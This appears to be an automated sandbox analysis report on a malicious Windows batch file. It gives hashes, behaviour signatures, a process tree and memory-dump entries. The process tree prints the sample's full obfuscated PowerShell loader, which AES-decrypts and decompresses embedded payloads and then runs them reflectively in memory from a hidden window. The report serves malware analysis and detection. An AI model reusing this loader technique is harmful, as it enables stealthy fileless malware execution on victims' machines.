Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
18-04-2024 01:38
Static task
static1
Behavioral task
behavioral1
Sample
59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951.bat
Resource
win7-20240221-en
windows7-x64
3 signatures
150 seconds
General
-
Target
59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951.bat
-
Size
6.9MB
-
MD5
a65e873839228c5b453d6effa5d14d16
-
SHA1
40be429e0e6b41061f3291d10e720eaebf32eda1
-
SHA256
59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951
-
SHA512
84ec1da7d5f5fe236c7fbe960b69d99ae0b6d3fe83844cd2bf3128508d39ad1de35f17dcb101e06fb25b155a806885bb5d6d095fbf3e0a3c729c678fa200f850
-
SSDEEP
24576:ClNzlllllllllllllllllllllllllllllllllllllllllllllllllllllllllllg:/
Score
1/10
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2884 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2884 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 1688 wrote to memory of 2252 1688 cmd.exe cmd.exe PID 1688 wrote to memory of 2252 1688 cmd.exe cmd.exe PID 1688 wrote to memory of 2252 1688 cmd.exe cmd.exe PID 2252 wrote to memory of 1292 2252 cmd.exe cmd.exe PID 2252 wrote to memory of 1292 2252 cmd.exe cmd.exe PID 2252 wrote to memory of 1292 2252 cmd.exe cmd.exe PID 2252 wrote to memory of 2884 2252 cmd.exe powershell.exe PID 2252 wrote to memory of 2884 2252 cmd.exe powershell.exe PID 2252 wrote to memory of 2884 2252 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951.bat2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951.bat';$XgWC='CJCPqopJCPqyToJCPq'.Replace('JCPq', ''),'DeKEVccoKEVcmKEVcpKEVcreKEVcsKEVcsKEVc'.Replace('KEVc', ''),'GeAJwHtCAJwHurrAJwHeAJwHntAJwHProAJwHceAJwHssAJwH'.Replace('AJwH', ''),'CGqtVreGqtVateGqtVDGqtVecrGqtVypGqtVtoGqtVrGqtV'.Replace('GqtV', ''),'TrashffnsfshfforshffmshffFinshffashfflBlshffocshffkshff'.Replace('shff', ''),'LoaAcuudAcuu'.Replace('Acuu', ''),'EnPhDKtPhDKrPhDKyPoPhDKiPhDKntPhDK'.Replace('PhDK', ''),'InvjPegokejPeg'.Replace('jPeg', ''),'ChBNFcangBNFceEBNFcxtBNFcenBNFcsBNFciBNFconBNFc'.Replace('BNFc', ''),'MamJZeimJZenmJZeMomJZedumJZelemJZe'.Replace('mJZe', ''),'SDiPVplDiPViDiPVtDiPV'.Replace('DiPV', ''),'ReZkbLadLZkbLinZkbLeZkbLsZkbL'.Replace('ZkbL', ''),'FBIJjrBIJjomBBIJjaBIJjseBIJj64BIJjStrBIJjiBIJjngBIJj'.Replace('BIJj', ''),'EleFaTTmeFaTTnFaTTtAFaTTtFaTT'.Replace('FaTT', '');powershell -w hidden;function nHhmY($bfNRC){$Wqjzg=[System.Security.Cryptography.Aes]::Create();$Wqjzg.Mode=[System.Security.Cryptography.CipherMode]::CBC;$Wqjzg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$Wqjzg.Key=[System.Convert]::($XgWC[12])('0/mNfjofNmhTDWKM5pVXBX9kZTvZAJfnb+xHxm0CsMs=');$Wqjzg.IV=[System.Convert]::($XgWC[12])('mimfsJsCvsdSCjq6OJjGsw==');$mEsqN=$Wqjzg.($XgWC[3])();$cIvUt=$mEsqN.($XgWC[4])($bfNRC,0,$bfNRC.Length);$mEsqN.Dispose();$Wqjzg.Dispose();$cIvUt;}function Jxpsl($bfNRC){$DhsxW=New-Object System.IO.MemoryStream(,$bfNRC);$abuYQ=New-Object System.IO.MemoryStream;$hMgwC=New-Object System.IO.Compression.GZipStream($DhsxW,[IO.Compression.CompressionMode]::($XgWC[1]));$hMgwC.($XgWC[0])($abuYQ);$hMgwC.Dispose();$DhsxW.Dispose();$abuYQ.Dispose();$abuYQ.ToArray();}$vXkJe=[System.IO.File]::($XgWC[11])([Console]::Title);$JakZo=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 5).Substring(2))));$GFnOO=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 6).Substring(2))));[System.Reflection.Assembly]::($XgWC[5])([byte[]]$GFnOO).($XgWC[6]).($XgWC[7])($null,$null);[System.Reflection.Assembly]::($XgWC[5])([byte[]]$JakZo).($XgWC[6]).($XgWC[7])($null,$null); "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2884-4-0x000000001B4F0000-0x000000001B7D2000-memory.dmpFilesize
2.9MB
-
memory/2884-5-0x0000000002890000-0x0000000002898000-memory.dmpFilesize
32KB
-
memory/2884-6-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmpFilesize
9.6MB
-
memory/2884-7-0x00000000029D0000-0x0000000002A50000-memory.dmpFilesize
512KB
-
memory/2884-8-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmpFilesize
9.6MB
-
memory/2884-9-0x00000000029D0000-0x0000000002A50000-memory.dmpFilesize
512KB
-
memory/2884-10-0x00000000029D0000-0x0000000002A50000-memory.dmpFilesize
512KB
-
memory/2884-11-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmpFilesize
9.6MB
-
memory/2884-12-0x00000000029D0000-0x0000000002A50000-memory.dmpFilesize
512KB
-
memory/2884-13-0x00000000029D0000-0x0000000002A50000-memory.dmpFilesize
512KB
-
memory/2884-14-0x00000000029D0000-0x0000000002A50000-memory.dmpFilesize
512KB
-
memory/2884-15-0x00000000029D0000-0x0000000002A50000-memory.dmpFilesize
512KB